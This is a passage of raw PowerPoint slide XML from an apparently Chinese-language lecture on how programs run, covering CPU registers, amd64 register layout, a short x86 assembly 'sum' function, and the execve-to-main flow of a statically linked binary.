          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3755502" y="3293396"/>
            <a:ext cx="4286128"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一次简单的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="32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127816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5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E20A92B-5D8C-4822-88F2-F312F8FBED61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1918003" y="1505118"/>
            <a:ext cx="3585985" cy="1961451"/>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cpu</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Shape 137">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73369065-BE11-4285-9A3F-E213DFE42E5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3608388" y="1801754"/>
            <a:ext cx="1251477" cy="50631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a:t>Register</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Shape 138">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25186C3C-10AD-4429-81C8-DDDCECA621ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3608388" y="2548879"/>
            <a:ext cx="1251477" cy="65056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Condition Codes</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Shape 139">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0B85644-AC0E-4720-90B0-D834111BA471}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2193370" y="2116354"/>
            <a:ext cx="1251477" cy="65484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Counter</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Shape 140">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{882AA08E-A0A6-4CB5-B5AD-902A38DD11D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7805715" y="1674969"/>
            <a:ext cx="2010229" cy="16149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Memory</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Code</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Data</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Stack</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Shape 141">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A55DAE05-9B77-4180-8D01-AC055384DDAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5528335" y="2206491"/>
            <a:ext cx="2277380" cy="1471"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Shape 142">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AD1EC1A-F8FA-4F3B-88EB-B736259ED818}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="6" idx="1"/>
            <a:endCxn id="2" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5503988" y="2482464"/>
            <a:ext cx="2301727" cy="3380"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Shape 143">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD1BF977-7E2D-4C76-903A-6886056A5079}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5526511" y="2771200"/>
            <a:ext cx="2279204" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Shape 144">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BCBE9B2-FD68-4767-8CBD-56FC242DA9AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6119198" y="1922550"/>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Address</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Shape 145">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DE01596-B20E-41C7-A6C5-043DFA23A416}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6119198" y="2201179"/>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Data</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Shape 146">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{851E3087-0D5B-4F81-B291-35B230B9B7C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5808360" y="2482463"/>
            <a:ext cx="1873152" cy="3404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Instruction</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Shape 147">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F02F13A3-A257-4E8E-9DA7-DA796D008897}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7132755" y="4267304"/>
            <a:ext cx="2683189" cy="174362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sum:</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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>push ebp</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ebp, esp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eax, [ebp+12]</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add eax, [ebp+8]</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pop ebp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ret</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Verdana"/>
              <a:ea typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
              <a:sym typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Shape 148">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A72542C9-FD2B-46E3-8C94-577DCAA0B115}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6797281" y="5116292"/>
            <a:ext cx="371413" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Shape 149">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{267BE163-EF0E-4DA9-95D7-99DA3B06D662}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6281881" y="4850256"/>
            <a:ext cx="637426" cy="5063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PC</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="Shape 150">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F756734-EC1F-4FE8-B56C-2665579540CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6797281" y="4911001"/>
            <a:ext cx="371413" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="连接符: 肘形 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C522494-CEF7-4080-9BB1-CF7779DC8024}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="6" idx="3"/>
            <a:endCxn id="13" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9815944" y="2482464"/>
            <a:ext cx="12700" cy="2656653"/>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箭头: 右 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6966EA9D-7C3F-4CC4-8C98-66A9DE6263CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9194835" y="2412123"/>
            <a:ext cx="641885" cy="150824"/>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F636260-8205-47E4-9CDD-EA31275526BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2438837" y="4619423"/>
            <a:ext cx="233910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进程的执行过程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="矩形 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F50D5A2-4B01-4D24-882B-13CF3B5F728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23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BB59FA0-D640-4CBB-9E97-5CE9DA147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4521"/>
            <a:ext cx="5152381" cy="5809524"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="文本框 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8122C1E4-0D06-4388-B5BB-90FBCF50F9BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="783962" y="921627"/>
            <a:ext cx="2741456"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amd64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>寄存器结构</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="文本框 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{214BACB4-24DE-4266-BA56-55C1F014E2AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1248031" y="1383292"/>
            <a:ext cx="1813317" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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rax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8Bytes</a:t>
            </a:r>
          </a:p>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4Bytes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2Bytes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ah</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al</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endParaRPr lang="zh-CN" altLang="en-US" dirty="0">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A3A43BF4-E13E-482C-B4A6-557B93DA2D54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="783962" y="332228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部分寄存器的功能</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="文本框 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{988D431C-1273-4D9D-9444-934A24F76FE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1248030" y="4029751"/>
            <a:ext cx="3993401" cy="2308324"/>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RIP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存放当前执行的指令的地址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RSP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存放当前栈帧的栈顶地址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RBP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存放当前栈帧的栈底地址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RAX</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通用寄存器。存放函数返回值</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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67B6E333-7C04-472C-9250-57C72ACC5E0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292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Shape 663"/>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 ./binary</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="664" name="Shape 664"/>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execve("./binary", *argv[], *envp[])</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="665" name="Shape 665"/>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66" name="Shape 666"/>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sys_execve()</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="667" name="Shape 667"/>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68" name="Shape 668"/>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69" name="Shape 669"/>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70" name="Shape 670"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6836300" y="378846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71" name="Shape 671"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6836300" y="30163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main()</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="672" name="Shape 672"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="663" idx="2"/>
            <a:endCxn id="665"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3" name="Shape 673"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="665" idx="2"/>
            <a:endCxn id="664"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4" name="Shape 674"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="664" idx="2"/>
            <a:endCxn id="666"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5" name="Shape 675"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="666" idx="2"/>
            <a:endCxn id="667"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6" name="Shape 676"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="667" idx="3"/>
            <a:endCxn id="668"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677" name="Shape 677"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="668" idx="0"/>
            <a:endCxn id="669"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8" name="Shape 678"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="669" idx="0"/>
            <a:endCxn id="670" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7613900" y="4172400"/>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9" name="Shape 679"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="670" idx="0"/>
            <a:endCxn id="671" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7613900" y="3400467"/>
            <a:ext cx="0" cy="388000"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="680" name="Shape 680"/>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681" name="Shape 681"/>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user mode</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="682" name="Shape 682"/>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kernel mode</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Shape 662">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDF641D7-71BE-4189-81FB-FA69D00BDFF9}"/>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静态链接的程序的执行过程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="矩形 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02F8ECE6-60F5-43B1-9694-EB1DA0BFFE3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Shape 689"/>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 ./binary</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="690" name="Shape 690"/>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execve("./binary", *argv[], *envp[])</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="691" name="Shape 691"/>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92" name="Shape 692"/>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sys_execve()</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="693" name="Shape 693"/>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94" name="Shape 694"/>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95" name="Shape 695"/>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96" name="Shape 696"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6847100"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97" name="Shape 697"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6485500" y="2276600"/>
            <a:ext cx="22784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__libc_start_main()</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="698" name="Shape 698"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="689" idx="2"/>
            <a:endCxn id="691"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99" name="Shape 699"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="691" idx="2"/>
            <a:endCxn id="690"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0" name="Shape 700"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="690" idx="2"/>
            <a:endCxn id="692"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701" name="Shape 701"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="692" idx="2"/>
            <a:endCxn id="693"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2" name="Shape 702"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="693" idx="3"/>
            <a:endCxn id="694"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703" name="Shape 703"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="694" idx="0"/>
            <a:endCxn id="695"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4" name="Shape 704"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="695" idx="0"/>
            <a:endCxn id="705" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="7613900" y="4172400"/>
            <a:ext cx="10800" cy="503200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="706" name="Shape 706"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="696" idx="0"/>
            <a:endCxn id="697" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7624700" y="2660517"/>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7" name="Shape 707"/>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708" name="Shape 708"/>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user mode</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
